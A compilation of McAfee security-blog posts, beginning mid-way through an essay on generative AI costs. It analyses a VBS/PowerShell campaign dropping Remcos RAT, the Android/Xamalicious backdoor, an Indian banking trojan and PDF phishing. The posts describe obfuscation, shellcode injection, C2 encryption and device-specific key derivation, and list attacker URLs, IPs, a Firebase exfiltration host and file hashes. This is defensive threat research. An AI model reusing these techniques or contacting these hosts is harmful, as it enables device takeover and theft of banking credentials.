However, in the rush to apply this transformative technology, we should also keep in mind “Maslow’s Hammer.” Attributed to Abraham Maslow, best known for outlining a hierarchy of needs, Maslow’s Hammer highlights an over-reliance on a single tool, a concept popularly summarized as “If all you have is a hammer, everything looks like a nail.” As corporations navigate the continuing evolution of AI, we need to be certain that we’re applying it where it makes the most sense, and not just because we can. This will ultimately save time, money, and energy that can be applied to building robust tools and solutions for viable use cases.
Recognizing when to use GenAI and when not to use it is a necessary skill set for full-stack domain-specific data scientists, engineers, and executives.
Running GenAI is expensive and not without tradeoffs. As of today, careless planning of a GenAI application can lead to a negative return on investment (due to the excessive operational cost), scalability and downtime issues (due to limited computing resources), and serious damage to the customer experience and brand reputation (due to the potential generation of improper content, hallucinations, mis/disinformation, misleading advice, etc.). Organizations struggle to control these variables in general, and the negative impacts and limitations must be offset by a huge value proposition.
One interesting aspect that can be observed across industries is the unexpected (but welcomed) side effects of going through the GenAI voyage, as some sort of eye-opening epiphany. How do we balance this risk/reward? What should we be looking at and what are the questions we should be asking to ensure that we’re successfully applying (or not) AI?
Breaking free from the complexity bias: as humans, we tend to favor and give credit to complex solutions only (known as ‘complexity bias’). Unfortunately, this particularly applies to GenAI applications nowadays, as we are influenced and “self-forced” to use GenAI to solve all problems. Just because “it seems to work”, it doesn’t mean it’s the best/optimal solution. It is by following this logic that some teams may have a significant chance of discovering that there are simpler (probably non-GenAI) means of solving some of these real-world problems (or parts of the problem!). Achieving this revelation requires a humble mind that is open to the possibility of considering that we don’t always need the most complex or expensive solution, even if it’s fancy and we can afford it.
It’s not always all or nothing: one aspect that works only for a few companies but not for most is the need to run GenAI all the time. If your business case is not around selling or supporting GenAI infrastructure, then you are likely using GenAI as a tool to accomplish domain-specific goals. If so, what every player in the industry would want is to maximize value while minimizing operational costs. At the current cost of running GenAI, the most obvious answer to achieve that is to avoid running it as much as possible, while still delivering most of the desired value. This delicate trade-off is a smart and elegant way of tackling the problem: not dismissing the value provided by GenAI nor obsessively using it up to the point that yields negative ROI. How do you achieve this? That’s likely the secret sauce of your domain-specific application area.
Ethical downsizing: GenAI models can be (and usually are) quite big. While this might be required for a few scenarios, it’s not necessary for most real-world domain-specific applications, as several GenAI authors are finding out across the industry (e.g., Phi-2). As such, it’s not only important for your business but also for humanity that we learn to downsize and optimize GenAI models as much as possible. It not only brings efficiency to your use case (cost saving, inference speed, lighter footprint, reduced risk, etc.) but also accomplishes a responsible use of the technology that is respectful of human resources. Each time you save a kilowatt or a few seconds of inference per user, you are explicitly contributing to a sustainable future where GenAI is leveraged to maximize value while minimizing environmental impact, and that’s something to be proud of.
Cross the stream where it is shallowest…
The key is to be humble enough to seek the optimal path: keep an open mind to consider non-GenAI solutions to your problems first. If GenAI is truly the best way to go, then find out if you really need to run it all the time or just sometimes. And finally, downsize as much as possible, not just because of cost and speed, but because of social responsibility.
GenAI is clearly having a moment with demonstrated potential. At the same time, being able to recognize the technical and financial downsides of GenAI is as important for the healthy development of the industry. In the same way we don’t use the hammer for every task at home, we should continuously ask: Is this problem worth GenAI? And is the value provided by this technology (when applied to my domain-specific use case) going to exceed the operational shortcomings? It is with this mindset that the industry will make significant and responsible progress in solving problems with a diverse but efficient set of tools. Let’s continue exploring and building the fascinating world of GenAI, without forgetting what our ultimate goals are.
The post Generative AI: Cross the Stream Where it is Shallowest appeared first on McAfee Blog.
Authored by Preksha Saxena and Yashvi Shah
McAfee Labs has been tracking a sophisticated VBS campaign characterized by obfuscated Visual Basic Scripting (VBS). Initially delivering the AgentTesla malware, the campaign has evolved into a multi-faceted threat, employing VBS scripts as a versatile delivery mechanism. Notably, this campaign extends beyond AgentTesla, now distributing a range of malware such as Guloader, Remcos RAT, Xworm, and Lokibot.
This campaign illustrates a comprehensive infection process initiated by a VBS file delivered via email. Starting with the activation of a VBS script, it progresses through PowerShell phases, utilizing the BitsTransfer utility for fetching a second-stage PowerShell script. The decoded and executed Shellcode A conceals and loads Shellcode B. In the final phase, wab.exe downloads the encrypted Remcos RAT payload. Shellcode B decrypts and injects it into wab.exe, making it function as the Remcos RAT.
The observed campaign has been noted for targeting diverse regions worldwide. Presented below is a geographical heatmap depicting McAfee customers who have been targeted and saved over the past three months.
Figure 1: Geo Heatmap showing targeted regions.
In the featured blog post, malicious actors utilized GuLoader to deploy the Remcos RAT.
Figure 2: Infection chain
The execution begins by running a VBS script. then it triggers the execution of the first-stage PowerShell. Subsequently, the BitsTransfer utility is employed to fetch a second-stage PowerShell which is base64 encoded.
The second stage PowerShell is then encoded and executed. Following this, the First Shellcode is meticulously carved out and loaded reflectively. The second Shellcode encoded within Shellcode A, undergoes decoding and is also reflectively loaded.
The final step involves a second Shellcode which is leveraged to retrieve and inject the Remcos RAT (Remote Control and Surveillance Tool) into a legitimate Windows process. In this case, wab.exe. This intricate series of actions allows for the stealthy deployment and operation of the Remcos RAT within the Windows environment.
Figure 3: Process Tree
Attached to the email is a ZIP file seemingly labeled as “revised_quotation_for_purchase_invoice_order_design_6th_november_2023“, resembling an invoice to the user. The intent, much like similar deceptive emails, is for the recipient not to scrutinize the email closely.
Inside the zip file attachment is a heavily obfuscated VBS file. The VBS script employed several techniques to make the analysis quite difficult. It has many garbage variables, decoy functions, and unnecessary comments, and all the malicious functions are obfuscated.
Figure 4: Heavily obfuscated script
The code appears streamlined after removing redundant lines, resulting in a more concise and efficient version. After removing all the comments, the script turned out to be as follows:
Figure 5: Post-removing the junk code
In the script, there’s a frequent appending of new strings to the variable “Fu6”. This method serves to increase the complexity of the analysis. Once all the strings are concatenated and formatted, the result emerges in a more intriguing manner. As shown in the below image.
Figure 6: After deobfuscating the code
The function “Mikr9” will handle the conversion of strings, rendering them readable. We converted all the lines to a readable format, with the help of the “Fu6” function. For example, as shown in Figure 5, the string
‘DelfhAdvetFagstStatpYapp:Nona/fisk/Indh1 Sic0 Tra3parc. Mon1Gens7Vide6Eufo.Tast1Outs1Midd1afte.Dors1husg6 Hal3Beja/ Hypm RenuColonSprgdNasahToasuRafflchon.GyttpBrnefMuckbAcci ‘ became http://103.176.111[.]163/mundhul.pfb.
Likewise, the entire script is decoded, and we get the following script:
Figure 7: After applying decrypting function Mikr9()
The script conducts the following sequence of activities:
The file retrieved shows zero detection on VT, appears to be base64 encoded, and has a size of 336KB.
Figure 8: Second Powershell script
Figure 9: Content is base64 encoded
Upon decoding “mundhul.pfb,” a detailed analysis can be conducted to comprehend its functionality, enabling further examination of the malware’s execution. Once the file gets decoded, it reveals a code resembling the image provided below.
Figure 10: Base64 decoded data
As specified in the script, execute a jump to offset 229981 and retrieve the ensuing 28050 units of data. This marks the start of the second PowerShell script, which is 28050 bytes, marked as follows.
Figure 11: Start of encrypted second PowerShell
The code contains various comments, so we followed the same procedure, as we did for the first script, removed all the junk code and we got a function that seems to handle the decryption of all the strings.
</centerFigure 12: After removing the junk
The decryption process iterates multiple times to unveil the strings, and the malware employs the “Invoke” method to execute its commands. After decoding all the strings using “Bedroges02” function, we finally got the intent of the script.
Figure 13: After applying decryption logic
The PowerShell script initially loads the VirtualAlloc() function and stores the memory handle in variables named “trll3” and “Akuammin195”. These sections possess permissions for writing, reading, and executing. The latter segment of the script appears to invoke a concealed shellcode embedded within it.
The execution sequence involves copying the bytes as follows: The initial 644 bytes from the beginning of this PowerShell script constitute the first shellcode. Subsequently, starting from byte 644, the script copies the next 229337 bytes, constituting the second shellcode.
Figure 14: Constituting shellcode
Following the execution sequence, malware initiates the API call CallWindowProcA, leading subsequently to the invocation of the native function NtProtectVirtualMemory. Then the process transitions directly to initiating the first shellcode.
The shellcode-A’s primary action involves copying the shellcode B into memory, as depicted in the figure below.
Figure 15: Loop used for copying shellcode B
The shellcode B undergoes decryption via XOR operation. This operation serves to transform the code into its executable form, allowing the decrypted shellcode to execute its intended instructions within the system’s memory.
Figure 16: Decryption loop used for decrypting shellcode B
The shellcode is designed to establish a new process named “wab.exe” and it replicates 0x3FC4000 bytes of decrypted shellcode into its memory space. As indicated by the highlighted blue box, the content decrypted from the second shellcode (shown in Figure 15) is subsequently injected into the wab.exe process (depicted in Figure 16).
Figure 17: Injection of second shellcode
The objective of the shellcode is to fetch the Remcos RAT from the specified URL, “hxxp://103.176.111.163/lnHxQotdQb132.bin” and subsequently inject it into the “wab.exe” process. Once “wab.exe” is injected by the final payload, it undertakes all malicious activities.
Figure 18: wab.exe connecting to C2
The file obtained from the provided URL seems to be an encrypted binary. Upon decryption, it has been recognized to initiate communication with the IP address 94.156.65.197 through port 2404. An observation revealed the creation of a mutex named “Rmc-R7V4VM.” Data keylogged during its operation is stored in a file labeled “logs.dat.” Additionally, screenshots captured are saved in a directory named “Screenshots,” while the overall repository for the collected data is titled “Remcos.”
Conclusion:
This campaign outlines the comprehensive infection process initiated by a VBS file received through email. The process begins with the activation of a VBS script, initiating the initial PowerShell phase. Subsequently, the BitsTransfer utility is used to fetch a second-stage PowerShell script, encoded in base64. After decoding and execution, the first Shellcode is carefully extracted and loaded reflectively. Simultaneously, Shellcode A conceals and loads the decoded Shellcode B.
In the final phase, the injected wab.exe proceeds to download the encrypted final payload of the Remcos RAT. Shellcode B is responsible for decrypting the payload, and it is subsequently injected into wab.exe. Consequently, this particular instance of wab.exe functions as the Remcos RAT.
VBScript in the Windows Environment: A Security Perspective
VBScript, introduced by Microsoft in 1996, was crucial in the Windows environment as a scripting language for task automation, tightly integrated with Internet Explorer, and a key component of technologies like Windows Script Host, Active Server Pages, and Office automation. It provided a simple scripting solution for system tasks, web development, and server-side logic. Microsoft is deprecating VBScript, and it will be available as a feature on-demand before eventual removal from Windows, said the company. This decision aligns with a broader strategy to reduce malware campaigns exploiting Windows and Office features. VBScript, disabled by default in Internet Explorer 11 since 2019, has been used by malicious actors for distributing malware, and Microsoft aims to enhance security by eliminating this infection vector. Attackers exploit vulnerabilities in phased-out technologies due to lingering use in legacy systems, slow adoption of updates, custom applications, stringent industry requirements, and user resistance to change. To mitigate risks, proactive measures such as prompt updates, security education, and staying informed about software lifecycles are crucial.
Mitigation:
Avoiding falling victim to email phishing involves adopting a vigilant and cautious approach. Here are some common practices to help prevent falling prey to email phishing:
VBS file | 6fdd246520eebb59e37a7cd544477567b405a11e118b7754ff0d4a89c01251e4 |
Second PowerShell | 5d21216a92ffea5b8ba70f48f9bcbb8a530a9b272423ae3ba519dbf74a905a65 |
Final payload | 7d947df412e78a595029121ecaf9d8a88e69175cffd1f2d75d31e3ca8995c978 |
URL1 | hxxp://103.176.111[.]163/mundhul.pfb |
URL2 | hxxp://103.176.111[.]163/lnHxQotdQb132.bin |
IP address | 103.176.111[.]163 |
IP address | 94.156.65[.]197 |
Mutex | Rmc-R7V4VM |
The post From Email to RAT: Deciphering a VB Script-Driven Campaign appeared first on McAfee Blog.
Authored by Fernando Ruiz
McAfee Mobile Research Team identified an Android backdoor implemented with Xamarin, an open-source framework that allows building Android and iOS apps with .NET and C#. Dubbed Android/Xamalicious it tries to gain accessibility privileges with social engineering and then it communicates with the command-and-control server to evaluate whether or not to download a second-stage payload that’s dynamically injected as an assembly DLL at runtime level to take full control of the device and potentially perform fraudulent actions such as clicking on ads, installing apps among other actions financially motivated without user consent.
The second stage payload can take full control of the infected device due to the powerful accessibility services that were already granted during the first stage which also contains functions to self-update the main APK which means that it has the potential to perform any type of activity like a spyware or banking trojan without user interaction. However, we identified a link between Xamalicious and the ad-fraud app “Cash Magnet” which automatically clicks ads, installs apps, and other actions to fraudulently generate revenue while users that installed it may earn points that are supposed to be redeemable as a retail gift card. This means that the developers behind these threats are financially motivated and drive ad-fraud therefore this might be one of the main payloads of Xamalicious.
The usage of the Xamarin framework allowed malware authors to stay active and without detection for a long time, taking advantage of the build process for APK files that worked as a packer to hide the malicious code. In addition, malware authors also implemented different obfuscation techniques and custom encryption to exfiltrate data and communicate with the command-and-control server.
We’ve identified about 25 different malicious apps that carry this threat. Some variants have been distributed on Google Play since mid-2020. The apps identified in this report were proactively removed by Google from Google Play ahead of our reporting. McAfee is a member of the App Defense Alliance and an active partner in the malware mitigation program, which aims to quickly find Potentially Harmful Applications (PHAs) and stop them before they ever make it onto Google Play. Android users are protected by Google Play Protect, which can warn users of identified malicious apps on Android devices. McAfee Mobile Security detects this threat as Android/Xamalicious.
Based on the number of installations these apps may have compromised at least 327,000 devices from Google Play plus the installations coming from third-party markets that continually produce new infections based on the detection telemetry of McAfee clients around the world. This threat remains very active.
Figure 1. “Count Easy Calorie Calculator” was available on Google Play on August 2022 and carries Android/Xamalicious
Android/Xamalicious trojans are apps related to health, games, horoscope, and productivity. Most of these apps are still available for download in third-party marketplaces.
Previously we detected malware abusing Xamarin framework such as the open-sourced AndroSpy and forked versions of it, but Xamalicious is implemented differently. Technical details about Xamarin architecture are well documented and detail how .NET code is interpreted by Android using Mono.
Let’s use the app “Numerology: Personal horoscope & Number predictions” as an example. Once started it immediately requests the victim to enable accessibility services for “correct work” and provides directions to activate this permission:
Figure 2. Tricking users into granting accessibility services permission
Users need to manually activate the accessibility services after several OS warnings such as the following on the accessibility options:
Figure 3. Accessibility services configuration prompt highlights the risks of this permission.
This is not the traditional Java code or native ELF Android application, the malware module was written originally in .NET and compiled into a dynamic link library (DLL). Then it is LZ4 compressed, and it might be embedded into a BLOB file, or directly available in the /assemblies directory on the APK structure. This code is loaded then by a native library (ELF) or by the DEX file at runtime level. In simple words, this means that in some samples the reversing of the DLL assemblies is straightforward while in others it requires extra steps to unpack them.
The malicious code is usually available in two different assembly files in the /assemblies directory on the apk. Usually, file names are core.dll and a <package-specific>.dll.
Some malware variants has obfuscated the DLL assemblies to avoid analysis and reversing of the malicious code while others keep the original code available.
Figure 4. Core.dll and GoogleService.dll contain malicious code.
Once accessibility permissions are granted the malware initiates communication with the malicious server to dynamically load a second-stage payload.
Figure 5. App execution and communication with the malicious server
Android/Xamalicious collects multiple device data including the list of installed applications obtained via system commands to determine if the infected victim is a good target for the second stage payload. The malware can collect location, carrier, and network information among device rooting status, adb connectivity configuration, for instance, if the device is connected via ADB or is rooted, the C2 will not provide a second-stage payload DLL for download.
Method/Command | Description |
DevInfo |
Hardware and device information that includes:
|
GeoInfo |
Location of the device based on IP address, the malware contacts services such as api.myip.com to verify the device location and ISP data.
FraudScore: Self-protection to identify if the device is not a real user |
EmuInfo |
It lists all adbProperties that in a real device are around 640 properties. This list is encoded as a string param in URL encoded format.
This data may be used to determinate if the affected client is a real device or emulator since it contains params such as:
|
RootInfo | After trying to identify if the device is rooted or not with multiple techniques the output is consolidated in this command |
Packages | It uses the system commands “pm list packages -s” and “pm list packages -3” to list system and installed apps on the device. |
Accessibility | It provides the status if accessibility services permissions are granted or not |
GetURL | This command only provides the Android Id and it’s a request for the second-stage payload. The C2 evaluates the provided client request and returns a status and an encrypted assembly DLL. |
To evade analysis and detection, malware authors encrypted all communication and data transmitted between the C2 and the infected device, not only protected by HTTPS, it’s encrypted as a JSON Web Encryption (JWE) token using RSA-OAEP with a 128CBC-HS256 algorithm however the RSA key values used by the Xamalicious are hardcoded in the decompiled malicious DLL so decryption of transmitted information is possible if C2 infrastructure is available during the analysis.
In the Send() function Android/Xamalicious first prepares the received object, usually a JSON structure calling the function encrypt() which creates the JWT using a hardcoded RSA key. So the data is exfiltrated fully encrypted to the malware host pointing to the path “/Updater” via HTTP POST method.
Then it waits for the C2 response and passes it to the decrypt() function which has a hardcoded RSA private key to properly decrypt the received command which might contain a second stage payload for the “getURL” command.
Encrypt Method:
Figure 6. Encrypt function with hardcoded RSA Key values as XML string
The decryption method is also hardcoded into malware which allowed the research team to intercept and decrypt the communication from the C2 using the RSA key values provided as XML string it’s possible to build a certificate with the parameters to decrypt the JWE tokens content.
Collected data is transmitted to the C&C to determine if the device is a proper target to download a second-stage payload. The self-protection mechanism of the malware authors goes beyond traditional emulation detection and country code operator limitations because in this case, the command-and-control server will not deliver the second stage payload if the device is rooted or connected as ADB via USB or does not have a SIM card among multiple other environment validations.
With the getURL command, the infected client requests the malicious payload, if the C&C Server determines that the device is “Ok” to receive the malicious library it will encrypt a DLL with Advanced encryption standard (AES) in Cipher block chaining (CBC) using a custom key for the client that requested it based on the device id and other parameters explained below to decrypt the code since it’s a symmetric encryption method, the same key works for encryption and decryption of the payload.
The encrypted DLL is inserted as part of the HTTP response in the encrypted JSON Web Token “JWT”. Then the client will receive the token, decrypt it, and then decrypt the ‘url’ parm with AES CBC and a custom key.
The AES key used to decrypt the assembly is unique per infected device and its string of 32 chars of length contains appended the device ID, brand, model, and a hardcoded padding of “1” up to 32 chars of length.
For instance, if the device ID is 0123456ABCDEF010 and the affected device is a Pixel 5, then the AES key is: “0123456ABCDEF010googlePixel 5111”
This means that the DLL has multiple layers of encryption.
All these efforts are related to hiding the payload and trying to stay under the radar where this threat had relative success since some variants might have been active years ago without AV detections.
Xamalicious will name this DLL “cache.bin” and store it in the local system to finally dynamically load it using the Assembly.Load method.
Once the second stage payload has been loaded the device can be fully compromised because once accessibility permissions are granted, it can obverse and interact with any activity opening a backdoor to any type of malicious activity.
During the analysis, the downloaded second stage payload contained a DLL with the class “MegaSDKXE” which was obfuscated and incomplete probably because the C2 didn’t receive the expected params to provide the complete malicious second stage that might be limited to a specific carrier, language, app installed, location, time zone or unknown conditions of the affected device, however, we can assure that this is a high-risk backdoor that leaves the possibility to dynamically execute any command on the affected device not limited to spying, impersonation or as a financially motivated malware.
One of the Xamalicious samples detected by McAfee Mobile generic signatures was “LetterLink” (com.regaliusgames.llinkgame) which was available on Google Play at the end of 2020, with a book icon. It was poorly described as a hidden version of “Cash Magnet”: An app that performs ad-fraud with automated clicker activity, apps downloads, and other tasks that lead to monetization for affiliate marketing. This application offers users points that are supposed to be redeemable by retail gift cards or cryptocurrency.
Figure 8a. LetterLink login page after running the app for the first time.
Figure 8b. LetterLink agreement for Cash Magnet
Originally published in 2019 on Google Play, “Cash Magnet” (com.uicashmagnet) was described as a passive income application offering users to earn up to $30 USD per month running automated ads. Since it was removed by Google the authors then infiltrated LetterLink and more recently “Dots: One Line Connector” (com.orlovst.dots) which are hidden versions of the same ad-fraud scheme.
Figure 9. LetterLink Icon that hides Cash Magnet
“LetterLink” performs multiple Xamalicious activities since it contains the “core.dll” library, it connects to the same C2 server, and it uses the same hardcoded private RSA certificate to build the JWE encrypted tokens which provide a non-repudiation proof that the developers of Cash Magnet are behind Xamalicious.
Figure 10. Cash Magnet infiltrated the app as a Game, available until the end of 2023
“Dots: One Line Connector” app is not a game, the screenshot published by Google Play does not correspond to the application behavior because once it is started it just asks for authentication credentials without any logo or reference to Cash Magnet. “Dots” does not contain the same DLLs as its predecessor, however the communication with the C2 is similar using the same RSA key parameters. We reported this app to Google and they promptly removed it from Google Play.
Based on our telemetry we observed that more affected users are in the American continent with the most activity in the USA, Brazil, and Argentina. In Europe, clients also reported the infection, especially in the UK, Spain, and Germany.
Figure 11. McAfee detections Android/Xamalicious around the world
Android applications written in non-java code with frameworks such as Flutter, react native and Xamarin can provide an additional layer of obfuscation to malware authors that intentionally pick these tools to avoid detection and try to stay under the radar of security vendors and keep their presence on apps markets.
Avoid using apps that require accessibility services unless there is a genuine need for use. If a new app tries to convince you to activate accessibility services claiming that it’s required without a real and reasonable reason and requesting to ignore the operative system warning, then it’s a red flag.
The second stage payload might take control of the device because accessibility permissions are granted so any other permission or action can then be performed by the malware if these instructions are provided in the injected code.
Because it is difficult for users to actively deal with all these threats, we strongly recommend that users install security software on their devices and always keep up to date. By using McAfee Mobile Security products, users can further safeguard their devices and mitigate the risks linked with these kinds of malware, providing a safer and more secure experience.
Android/Xamalicious Samples Distributed on Google Play:
Package Name | App Name | Installs |
com.anomenforyou.essentialhoroscope | Essential Horoscope for Android | 100,000 |
com.littleray.skineditorforpeminecraft | 3D Skin Editor for PE Minecraft | 100,000 |
com.vyblystudio.dotslinkpuzzles | Logo Maker Pro | 100,000 |
com.autoclickrepeater.free | Auto Click Repeater | 10,000 |
com.lakhinstudio.counteasycaloriecalculator | Count Easy Calorie Calculator | 10,000 |
com.muranogames.easyworkoutsathome | Sound Volume Extender | 5,000 |
com.regaliusgames.llinkgame | LetterLink | 1,000 |
com.Ushak.NPHOROSCOPENUMBER | NUMEROLOGY: PERSONAL HOROSCOPE &NUMBER PREDICTIONS | 1,000 |
com.browgames.stepkeepereasymeter | Step Keeper: Easy Pedometer | 500 |
com.shvetsStudio.trackYourSleep | Track Your Sleep | 500 |
com.devapps.soundvolumebooster | Sound Volume Booster | 100 |
com.Osinko.HoroscopeTaro | Astrological Navigator: Daily Horoscope & Tarot | 100 |
com.Potap64.universalcalculator | Universal Calculator | 100 |
|
The post Stealth Backdoor “Android/Xamalicious” Actively Infecting Devices appeared first on McAfee Blog.
Authored by Neil Tyagi and Fernando Ruiz
In a digitally evolving world, the convenience of banking through mobile applications has revolutionized financial transactions. However, this advancement has also opened doors to a lesser-known adversary: Android phishing. Join us as we delve into the clandestine realm of cyber threats targeting India’s banking sector.
This blog uncovers the nuances of an Android phishing/banking trojan application identified as Android/Banker.AFX illustrates a common procedure from cybercriminals designed to drain the bank accounts of their victims:
First broadcasting phishing messages via WhatsApp and luring users to install an app that carries malicious code hidden as a verification tool. Once installed, the banking trojan can collect personal and financial information plus intercept SMS messages with the objective of stealing one-time passwords or verification codes that are required to complete transactions which may lead to stealing the banking account assets.
This trojan is just a variant and example of multiple banking trojans implementations recently observed in the wild that carry similar risks, which is not technically sophisticated but might be very effective and prevalent especially when it’s widely distributed on social media. McAfee Mobile Security protects broadly and generically against this type of banking trojans.
This blog explores the insidious tactics, alarming trends, and preventive measures against the rising tide of phishing attacks plaguing Android users in India’s financial landscape.
A sense of urgency is created for the user by warning him that the account would be blocked if he doesn’t install the APK and provide the necessary information to complete the KYC form.
These seemingly innocent prompts, meticulously crafted by cybercriminals, possess a cunning sophistication that mirrors the legitimate communication channels of banking institutions. They prey upon human curiosity, fear, and desire, tricking users into taking immediate actions that, at first glance, seem innocuous but have far-reaching consequences.
Since the app installer is triggered by Whatsapp, the installation by default should be blocked by Android unless the user previously allowed the installation of unknown apps from this source.
A warning is displayed after taping on the APK icon:
However, if users ignore the warning, they may deactivate this important security feature with just two clicks:
Now Android OS is warning about the risk of allowing the installation of unknown apps from WhatsApp. However, many users allow this option, which poses a high risk of infection.
Once the Trojan is installed, the victims will get the financial institution icon on their Android app list:
After installation, it abuses the icon of SBI to confuse the user.
Opening for the first time, it asks for SMS-related permissions.
The application’s landing page is similar to the net banking page of Real SBI.
This phishing site is locally loaded from the malware into a WebView.
The application asks for the user’s username, password, and phone number.
The Captcha used here is static. It does not change ever because all content is hardcoded locally.
As part of the KYC validation lure process, the malware collects sensitive user information such as:
After the victim inputs all the information, they are presented with a fake KYC validation code, which makes it look like a genuine procedure the user might not be suspicious about the app or the process.
Additionally, this banking trojan intercepts SMS messages and abuses Firebase to communicate with attackers. During the analysis the malware transmitted all collected information including credit card information to:
wss[:]//s-usc1a-nss-2003.firebaseio.com/.ws?v=5&ns=zero-a4c52-default-rtdb
According to the static analysis, any received SMS message would also be exfiltrated to the attackers’ servers via the opened socket communication since the app has granted SMS reading permissions at the first execution. This is implemented to extract any OTP required to complete transactions of the victim.
Exfiltrated credit card information from the local static site loaded by the malware abuses the Cordova framework. Credit card information, along with all collected information, is transmitted to the attackers using Firebase, a legitimate service that’s also abused by criminals.
Android/Banker.AXF!ML infections around the world: India is the target.
Banking trojans are not new or sophisticated but they are a persistent threat due to the lucrative business that poses for malware authors which can lure many victims that are unaware of the risk of phishing. As these campaigns can be massive even if a small percentage of targeted victims fall the criminals can have a large loot.
Cybercriminals are constantly improving their social engineering tricks to lure users into phishing and malware. The first line of defense against these threats is the user’s awareness. Some generic advises are:
McAfee Antivirus emerges as a formidable ally in the battle against Android phishing within India’s banking sector. With its robust suite of security features tailored for mobile devices, McAfee stands as a bulwark, providing critical defense mechanisms against the ever-mutating landscape of cyber threats.
Hash | Package |
7cfc6360e69d22b09a28c940caf628959d11176e27b8a03e15b020b369569415 | hello.uwer.hello.hello.google.is.the.best |
b067f5903e23288842ad056d4b31299b3b30052abe69bee236136b2b9fcab6a8 | hello.uwer.hello.hello.google.is.the.best |
e2e097ef433be75dcab830baa4b08feb4a24267c46b568fd4aef00dbb081ed8f | hello.uwer.hello.hello.google.is.the.best |
9f046f769760d52a97680a91fd511f1e86c428b9eec27d7eb486b7b4d0666f0b | hello.uwer.hello.hello.google.is.the.best |
1c69b0a69ed1631a1f1b54627a9b5dac3b214a275280de36d05ee75021cbfb04 | hello.uwer.hello.hello.google.is.the.best |
495ab4efd3d1ec9bfc2d08d80df316aad20dc76e625374627fabea06f5151584 | hello.uwer.hello.hello.google.is.the.best |
6190144b56e06af8aeeeba2104a665a555d01f6ec2a22ba78212d943ac2b258d | hello.uwer.hello.hello.google.is.the.best |
6c6ea9fbeae967fb53ab9984edda9b754fb6d3f85b4ff5b14e1fd33399362ba4 | hello.uwer.hello.hello.google.is.the.best |
Abused Firebase host : Wss[:]//s-usc1a-nss-2003.firebaseio.com/.ws?v=5&ns=zero-a4c52-default-rtdb
The post Shielding Against Android Phishing in Indian Banking appeared first on McAfee Blog.
By Lakshya Mathur & Yashvi Shah
Phishing attackers aim to deceive individuals into revealing sensitive information for financial gain, credential theft, corporate network access, and spreading malware. This method often involves social engineering tactics, exploiting psychological factors to manipulate victims into compromising actions that can have profound consequences for personal and organizational security.
Over the last four months, McAfee Labs has observed a rising trend in the utilization of PDF documents for conducting a succession of phishing campaigns. These PDFs were delivered as email attachments.
Attackers favor using PDFs for phishing due to the file format’s widespread trustworthiness. PDFs, commonly seen as legitimate documents, provide a versatile platform for embedding malicious links, content, or exploits. By leveraging social engineering and exploiting the familiarity users have with PDF attachments, attackers increase the likelihood of successful phishing campaigns. Additionally, PDFs offer a means to bypass email filters that may focus on detecting threats in other file formats.
The observed phishing campaigns using PDFs were diverse, abusing various brands such as Amazon and Apple. Attackers often impersonate well-known and trusted entities, increasing the chances of luring users into interacting with the malicious content. Additionally, we will delve into distinct types of URLs utilized by attackers. By understanding the themes and URL patterns, readers can enhance their awareness and better recognize potential phishing attempts.
Figure 1 – PDF Phishing Geo Heatmap showing McAfee customers targeted in last 1 month
Attackers employ a range of corporate themes in their social engineering tactics to entice victims into clicking on phishing links. Notable brands such as Amazon, Apple, Netflix, and PayPal, among others, are often mimicked. The PDFs are carefully crafted to induce a sense of urgency in the victim’s mind, utilizing phrases like “your account needs to be updated” or “your ID has expired.” These tactics aim to manipulate individuals into taking prompt action, contributing to the success of the phishing campaigns.
Below are some of the examples:
Figure 2 – Fake Amazon PDF Phish
Figure 3 – Fake Apple PDF Phish
Figure 4 – Fake Internal Revenue Service PDF Phish
Figure 5 – Fake Adobe PDF Phish
Below are the stats on the volume of various themes we have seen in these phishing campaigns.
Figure 6 – Different themed campaign stats based on McAfee customers hits in last 1 month
Cyber attackers are exploiting the popular professional networking platform LinkedIn and leveraging Google Apps Script to redirect users to phishing websites. Let us examine each method of abuse individually.
In the case of LinkedIn, attackers are utilizing smart links to circumvent Anti-Virus and other security measures. Smart links are integral to the LinkedIn Sales Navigator service, designed for tracking and marketing business accounts.
Figure 7 – LinkedIn Smart link redirecting to an external website
By employing these smart links, attackers redirect their victims to phishing pages. This strategic approach allows them to bypass traditional protection measures, as the use of LinkedIn as a referrer adds an element of legitimacy, making it more challenging for security systems to detect and block malicious activity.
In addition to exploiting LinkedIn, attackers are leveraging the functionality of Google Apps Script to redirect users to phishing pages. Google Apps Script serves as a JavaScript-based development platform used for creating web applications and various other functionalities. Attackers embed malicious or phishing code within this platform, and when victims access the associated URLs, it triggers the display of phishing or malicious pages.
Figure 8 – Amazon fake page displayed on accessing Google script URL
As shown in Figure 8, when victims click on the “Continue” button, they are subsequently redirected to a phishing website.
Crafting highly convincing PDFs mimicking legitimate companies has become effortlessly achievable for attackers. These meticulously engineered PDFs create a sense of urgency through skillful social engineering, prompting unsuspecting customers to click on embedded phishing links. Upon taking the bait, individuals are redirected to deceptive phishing websites, where attackers request sensitive information. This sophisticated tactic is deployed on a global scale, with these convincing PDFs distributed to thousands of customers worldwide. Specifically, we highlighted the increasing use of PDFs in phishing campaigns over the past four months, with attackers adopting diverse themes such as Amazon and Apple to exploit user trust. Notably, phishing tactics extend to popular platforms like LinkedIn, where attackers leverage smart links to redirect victims to phishing pages, evading traditional security measures. Additionally, Google Apps Script is exploited for its JavaScript-based functionality, allowing attackers to embed malicious code and direct users to deceptive websites.
Protecting oneself from phishing requires a combination of awareness, caution, and security practices. Here are some key steps to help safeguard against phishing:
McAfee provides coverage against a broad spectrum of active phishing campaigns, offering protection through features such as real-time scanning and URL filtering. While it enhances security against various phishing attempts, users must remain vigilant and adopt responsible online practices along with using McAfee.
The post PDF Phishing: Beyond the Bait appeared first on McAfee Blog.
Short-URL services have emerged as a crucial part of the way we use the Internet. With the increasing use of social media, where the number of characters is limited, short-URL services are a useful tool for reducing a URL’s length. However, this convenience also comes with a potential risk. The anonymity provided by these services can serve as a breeding ground for online threats. This article delves deeper into the potential risks associated with using short-URL services and how you can safeguard yourself from these threats.
Short-URL services are online tools that convert a long URL into a short one. These services are often free and easy to use: you simply enter the long URL you wish to shorten and the service will generate a short URL for you. This can be particularly handy for social media platforms such as Twitter, where character limits can make sharing long URLS impractical.
The short URL does not provide any clues about the destination website – it is a random mix of letters and numbers. This lack of transparency can make it difficult for users to determine the legitimacy of the link before clicking it. Consequently, this has opened a pandora’s box for cyber threats, as ill-intentioned individuals can hide malicious links behind these short URLs.
While the brevity provided by short-URL services is a practical solution in the age of character-limited social media posts, it’s important to understand the accompanying risks. With the shortened URL, the original URL is hidden, which can make it challenging for users to discern whether the link is safe or not. This very feature is exploited by cybercriminals who mask malicious sites with short URLs, intending to trick users into visiting harmful web pages.
